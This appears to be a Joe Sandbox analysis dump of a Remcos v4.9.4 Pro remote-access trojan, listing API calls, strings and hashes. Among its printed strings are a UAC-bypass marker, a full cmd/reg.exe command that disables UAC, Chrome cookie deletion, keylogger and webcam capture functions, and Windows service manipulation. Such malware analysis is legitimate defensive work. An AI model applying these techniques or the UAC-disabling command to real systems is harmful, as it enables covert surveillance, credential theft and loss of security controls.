                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                      • String ID: (mG
                                      • API String ID: 2536120697-4059303827
                                      • Opcode ID: 34a51a48ebffab58c1c893f3ae79879d0a70666fb45cbfefdea1ee74b3510b9f
                                      • Instruction ID: 9d9da6683174d9a5c92fa95d325e3547e0845688fcbb555b93a4fb26f280994d
                                      • Opcode Fuzzy Hash: 34a51a48ebffab58c1c893f3ae79879d0a70666fb45cbfefdea1ee74b3510b9f
                                      • Instruction Fuzzy Hash: 1411EB32900518A7CB14BB9AD8058DEBB79DF44354F10456FBE04A72D1DB789D40C7D9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                        • Part of subcall function 004135A6: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                        • Part of subcall function 004135A6: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 004135E7
                                        • Part of subcall function 004135A6: RegCloseKey.ADVAPI32(?), ref: 004135F2
                                      • StrToIntA.SHLWAPI(00000000,0046C9F8,00000000,00000000,00000000,004750E4,00000003,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0041B33C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseCurrentOpenProcessQueryValue
                                      • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                      • API String ID: 1866151309-2070987746
                                      • Opcode ID: 739a84b6b521fba7f3deec685196c40b2f0f20dc19e43594882229fa67cbe478
                                      • Instruction ID: 0537cd1ef0e49ffa1b211e53375311a7de90e31f2ded896f28e78de68f6ce99c
                                      • Opcode Fuzzy Hash: 739a84b6b521fba7f3deec685196c40b2f0f20dc19e43594882229fa67cbe478
                                      • Instruction Fuzzy Hash: 42112370A4010566C704B3668C87EFF77198B95314F94013BF856A21E2FB6C599683AE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetLastError.KERNEL32(?,?,0043A351,004392BE), ref: 0043A368
                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A376
                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A38F
                                      • SetLastError.KERNEL32(00000000,?,0043A351,004392BE), ref: 0043A3E1
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLastValue___vcrt_
                                      • String ID:
                                      • API String ID: 3852720340-0
                                      • Opcode ID: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
                                      • Instruction ID: 5d53a0da36a7034647469206452edf011e0dcb0cee8899775f26e7a14c982385
                                      • Opcode Fuzzy Hash: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
                                      • Instruction Fuzzy Hash: 7F01283214C3519EA61526796C86A6B2648EB0A7B9F30133FF918815F1EF594C90514D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Users\user\AppData\Roaming\NvbYSEq.exe), ref: 004075D0
                                        • Part of subcall function 004074FD: _wcslen.LIBCMT ref: 00407521
                                        • Part of subcall function 004074FD: CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                                      • CoUninitialize.OLE32 ref: 00407629
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InitializeObjectUninitialize_wcslen
                                      • String ID: C:\Users\user\AppData\Roaming\NvbYSEq.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                      • API String ID: 3851391207-1599083158
                                      • Opcode ID: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                                      • Instruction ID: 681a2da4e9d4b9e6b45db6330fec0c9e961fb52a18ca78f8243115a9baea1a6b
                                      • Opcode Fuzzy Hash: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                                      • Instruction Fuzzy Hash: B201D272B087016BE2245B25DC0EF6B7758DB81729F11083FF902A61C2EBA9BC0145AB
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BADD
                                      • GetLastError.KERNEL32 ref: 0040BAE7
                                      Strings
                                      • UserProfile, xrefs: 0040BAAD
                                      • [Chrome Cookies not found], xrefs: 0040BB01
                                      • [Chrome Cookies found, cleared!], xrefs: 0040BB0D
                                      • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAA8
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: DeleteErrorFileLast
                                      • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                      • API String ID: 2018770650-304995407
                                      • Opcode ID: 3ac18cd69eb512cfe3046ffff68c330a49271f1a171cc2acfba67e1dc9669370
                                      • Instruction ID: 6bc0ec4de36c0471385c24d45a27137009bd471b3f80e31671ebbef4da92dce6
                                      • Opcode Fuzzy Hash: 3ac18cd69eb512cfe3046ffff68c330a49271f1a171cc2acfba67e1dc9669370
                                      • Instruction Fuzzy Hash: 08018F31A402095ACA04BBBACD5B8BE7724E912714F50017BF802726E6FE7D5A059ADE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • AllocConsole.KERNEL32(00475338), ref: 0041CDA4
                                      • ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                                      • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Console$AllocOutputShowWindow
                                      • String ID: Remcos v$4.9.4 Pro$CONOUT$
                                      • API String ID: 2425139147-3065609815
                                      • Opcode ID: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                                      • Instruction ID: 3d4e39fb732e2b6cb40f789e287104da8d9afdf675614735db993d10cd8ea689
                                      • Opcode Fuzzy Hash: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                                      • Instruction Fuzzy Hash: CD0188719803087AD610F7F1DC8BF9D776C5B14705F6004277604A70D3E7BD9954466E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,PkGNG,004432EB,00000003,PkGNG,0044328B,00000003,0046E948,0000000C,004433E2,00000003,00000002), ref: 0044335A
                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044336D
                                      • FreeLibrary.KERNEL32(00000000,?,?,PkGNG,004432EB,00000003,PkGNG,0044328B,00000003,0046E948,0000000C,004433E2,00000003,00000002,00000000,PkGNG), ref: 00443390
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressFreeHandleLibraryModuleProc
                                      • String ID: CorExitProcess$PkGNG$mscoree.dll
                                      • API String ID: 4061214504-213444651
                                      • Opcode ID: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                                      • Instruction ID: b4f1316bd170a33105784e50650a9bde6d9e9410588fddf83d5a1a7bf10dc45d
                                      • Opcode Fuzzy Hash: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                                      • Instruction Fuzzy Hash: 6AF0A430A00208FBDB149F55DC09B9EBFB4EF04713F0041A9FC05A2261CB349E40CA98
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • __allrem.LIBCMT ref: 0043AC69
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AC85
                                      • __allrem.LIBCMT ref: 0043AC9C
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACBA
                                      • __allrem.LIBCMT ref: 0043ACD1
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACEF
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                      • String ID:
                                      • API String ID: 1992179935-0
                                      • Opcode ID: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                                      • Instruction ID: 0cac597ccac2158415e78c81c2c349525783c2449c9f0a8280db41f57d0428da
                                      • Opcode Fuzzy Hash: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                                      • Instruction Fuzzy Hash: CC812B72640706ABE7209F29CC41B5BB3A9EF48324F24552FF590D7781EB7CE9108B5A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • Sleep.KERNEL32(00000000,?), ref: 004044C4
                                        • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: H_prologSleep
                                      • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                      • API String ID: 3469354165-3054508432
                                      • Opcode ID: 92d61490a4b2957e555669ba2acdc23e21a020ddb9508585be9bb95eb31fcb07
                                      • Instruction ID: 62663cdee79800d8a54f028f5a980ee1c6790ad11611a7059aef087dab150aaf
                                      • Opcode Fuzzy Hash: 92d61490a4b2957e555669ba2acdc23e21a020ddb9508585be9bb95eb31fcb07
                                      • Instruction Fuzzy Hash: 5C51E1B1A042116BCA14FB369D0A66E3755ABC5748F00053FFA06677E2EF7C8A45839E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __cftoe
                                      • String ID:
                                      • API String ID: 4189289331-0
                                      • Opcode ID: 73f4726c011166e6bdcb5754414c0ade346116ed487fada7dd59cfb8b2f8224a
                                      • Instruction ID: 6c78d09a6f5169ef6f707262af513c71f712f2c279f5202ad8aecd4a6012115a
                                      • Opcode Fuzzy Hash: 73f4726c011166e6bdcb5754414c0ade346116ed487fada7dd59cfb8b2f8224a
                                      • Instruction Fuzzy Hash: D951EA72900A05ABFF209B59CC81FAF77A9EF49334F14421FF515A6293DB39D900866C
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041AC88
                                      • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A38E,00000000), ref: 0041AC9C
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACA9
                                      • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041ACDE
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF0
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF3
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                      • String ID:
                                      • API String ID: 493672254-0
                                      • Opcode ID: f3d4b447748c037b2dac55463b57a149c398f0d820f611c96b244fdc7ed94624
                                      • Instruction ID: ed0bae8235b77a8e2b5b4951a925fd67a34dfbd091713fce30693036f81a5133
                                      • Opcode Fuzzy Hash: f3d4b447748c037b2dac55463b57a149c398f0d820f611c96b244fdc7ed94624
                                      • Instruction Fuzzy Hash: 84014E311452147BD6110B385C4DEFB3B5CDB42771F100317F925922D1EA68CD45B5EE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __alldvrm$_strrchr
                                      • String ID: PkGNG
                                      • API String ID: 1036877536-263838557
                                      • Opcode ID: 6e4ce0a9cd107544135c8758f381171db584a835852a0c7515be2cd765a07ccf
                                      • Instruction ID: 0200e234d7a66e392568480c50467de0d06b46efb2a76a7ba0b74d69ca9a70f2
                                      • Opcode Fuzzy Hash: 6e4ce0a9cd107544135c8758f381171db584a835852a0c7515be2cd765a07ccf
                                      • Instruction Fuzzy Hash: 57A166319843869FFB21CF58C8817AEBBA1FF25304F1441AFE9859B382C27D8951C75A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                      • _free.LIBCMT ref: 0044824C
                                      • _free.LIBCMT ref: 00448274
                                      • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281
                                      • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                      • _abort.LIBCMT ref: 00448293
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast$_free$_abort
                                      • String ID:
                                      • API String ID: 3160817290-0
                                      • Opcode ID: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
                                      • Instruction ID: 1e51d54565af68f960eede883612623578b8b4ccb82fc25c91f14e3db4823c68
                                      • Opcode Fuzzy Hash: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
                                      • Instruction Fuzzy Hash: 15F0F935104F006AF611332A6C05B5F2515ABC276AF25066FF92892292DFACCC4581AD
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAB5
                                      • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAC9
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAD6
                                      • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAE5
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAF7
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAFA
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Service$CloseHandle$Open$ControlManager
                                      • String ID:
                                      • API String ID: 221034970-0
                                      • Opcode ID: bc8933c3fd8e2fa998b2246ab8c72ed9b0f5170f60f0245b371609b51ac54b8f
                                      • Instruction ID: 651adf303b3d55a6ad93a9774d9c6d096703db2647e4265c62a250da7e042a32
                                      • Opcode Fuzzy Hash: bc8933c3fd8e2fa998b2246ab8c72ed9b0f5170f60f0245b371609b51ac54b8f
                                      • Instruction Fuzzy Hash: 68F0C231541218ABD711AF25AC49EFF3B6CDF45BA2F000026FE0992192DB68CD4695E9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABB9
                                      • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABCD
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABDA
                                      • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABE9
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFB
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFE
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Service$CloseHandle$Open$ControlManager
                                      • String ID:
                                      • API String ID: 221034970-0
                                      • Opcode ID: 94d93926ec858c5890fc603d54741d931e0eaafa3f6b468ff921a10e10d86c77
                                      • Instruction ID: cdcae22f94af1ce7d279f83afe572816001e75aa845eac4345c2c81124f82824
                                      • Opcode Fuzzy Hash: 94d93926ec858c5890fc603d54741d931e0eaafa3f6b468ff921a10e10d86c77
                                      • Instruction Fuzzy Hash: 84F0C231501218ABD6116F259C49DFF3B6CDB45B62F40002AFE0996192EB38DD4595F9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC20
                                      • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC34
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC41
                                      • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC50
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC62
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC65
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Service$CloseHandle$Open$ControlManager
                                      • String ID:
                                      • API String ID: 221034970-0
                                      • Opcode ID: 4f42f77feb4e09d2984437374767d6fba58dab4553ac710dbf5187c031f369c2
                                      • Instruction ID: 1af6be829003de2eeb85b71d4b0cbdb2c911632148e7083bdbbda8586ff13133
                                      • Opcode Fuzzy Hash: 4f42f77feb4e09d2984437374767d6fba58dab4553ac710dbf5187c031f369c2
                                      • Instruction Fuzzy Hash: 2FF0F631501228BBD711AF25EC49DFF3B6CDB45B62F00002AFE0992192EB38CD4595F9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: PkGNG
                                      • API String ID: 0-263838557
                                      • Opcode ID: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                                      • Instruction ID: 497cf8d2f4a88fd96e7f98feeb1d24cd381d204b534fd1f3fd6e485e43360072
                                      • Opcode Fuzzy Hash: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                                      • Instruction Fuzzy Hash: EA413871A00704BFF324AF79CD41B5EBBA9EB88710F10862FF105DB681E7B999418788
                                      Uniqueness
                                      • Uniqueness Score: -1.00%

                                      APIs
                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                                      • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404DD2
                                      • CloseHandle.KERNEL32(?), ref: 00404DDB
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                      • String ID: PkGNG
                                      • API String ID: 3360349984-263838557
                                      • Opcode ID: 49fe4c89c4b53e0bfaa247814761066ed204ae0ee87e3a5f8c156f36cd8984b3
                                      • Instruction ID: 465453d6db43d9529954589ba2efa69a6de0eb64d520c2048147815e962fb190
                                      • Opcode Fuzzy Hash: 49fe4c89c4b53e0bfaa247814761066ed204ae0ee87e3a5f8c156f36cd8984b3
                                      • Instruction Fuzzy Hash: 3E4192B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                      Uniqueness
                                      • Uniqueness Score: -1.00%

                                      APIs
                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\NvbYSEq.exe,00000104), ref: 00443475
                                      • _free.LIBCMT ref: 00443540
                                      • _free.LIBCMT ref: 0044354A
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$FileModuleName
                                      • String ID: 83$C:\Users\user\AppData\Roaming\NvbYSEq.exe
                                      • API String ID: 2506810119-4175111071
                                      • Opcode ID: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                                      • Instruction ID: 78b8e4ab202bb8962dfea6a4c95dea7b8c186c0554b41bb8e719afd17783d6d0
                                      • Opcode Fuzzy Hash: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                                      • Instruction Fuzzy Hash: 2E31C471A00258BFEB21DF999C8199EBBBCEF85B15F10406BF50497311D6B89F81CB98
                                      Uniqueness
                                      • Uniqueness Score: -1.00%

                                      APIs
                                      • GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
                                      • wsprintfW.USER32 ref: 0040B1F3
                                        • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: EventLocalTimewsprintf
                                      • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                      • API String ID: 1497725170-248792730
                                      • Opcode ID: 48ae87abe5a633f6dbf757c3d9d37f4c5ebff31f90a39cbd1b197af817f8fe73
                                      • Instruction ID: 81b60f5d3581edaaac31e3e44e1e4f5c322996b2d8bf5e7d6f89c643b346fb92
                                      • Opcode Fuzzy Hash: 48ae87abe5a633f6dbf757c3d9d37f4c5ebff31f90a39cbd1b197af817f8fe73
                                      • Instruction Fuzzy Hash: 82117F72504118AACB18AB96EC558FE77BCEE48315B00012FF506A60E1FF7C9E46C6AC
                                      Uniqueness
                                      • Uniqueness Score: -1.00%

                                      APIs
                                      • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                                      • Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                                      • CloseHandle.KERNEL32(00000000,?,?,?,0040A74D), ref: 0040A6EE
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseCreateHandleSizeSleep
                                      • String ID: XQG
                                      • API String ID: 1958988193-3606453820
                                      • Opcode ID: 38e21002b9c7a7665831af374e9118a36682828a780468fd2ba8ddd7b6ab83cd
                                      • Instruction ID: 2d5b847f40b6dc6d65e682cb961bc0859910b41d7418e35cc132b68a4a9af338
                                      • Opcode Fuzzy Hash: 38e21002b9c7a7665831af374e9118a36682828a780468fd2ba8ddd7b6ab83cd
                                      • Instruction Fuzzy Hash: AD112B30600740EEE631A7249895A5F3B6AEB41356F48083AF2C26B6D2C6799CA0C35E
                                      Uniqueness
                                      • Uniqueness Score: -1.00%

                                      APIs
                                      • RegisterClassExA.USER32(00000030), ref: 0041D55B
                                      • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
                                      • GetLastError.KERNEL32 ref: 0041D580
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ClassCreateErrorLastRegisterWindow
                                      • String ID: 0$MsgWindowClass
                                      • API String ID: 2877667751-2410386613
                                      • Opcode ID: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                                      • Instruction ID: 921741f364e14ac5d494c0d6481b3569f22aad0bbfd2e997b493b5423d792a6e
                                      • Opcode Fuzzy Hash: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                                      • Instruction Fuzzy Hash: 910129B1D00219BBDB00DFD5ECC49EFBBBDEA04355F40053AF900A6240E77859058AA4
                                      Uniqueness
                                      • Uniqueness Score: -1.00%

                                      APIs
                                      • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040779B
                                      • CloseHandle.KERNEL32(?), ref: 004077AA
                                      • CloseHandle.KERNEL32(?), ref: 004077AF
                                      Strings
                                      • C:\Windows\System32\cmd.exe, xrefs: 00407796
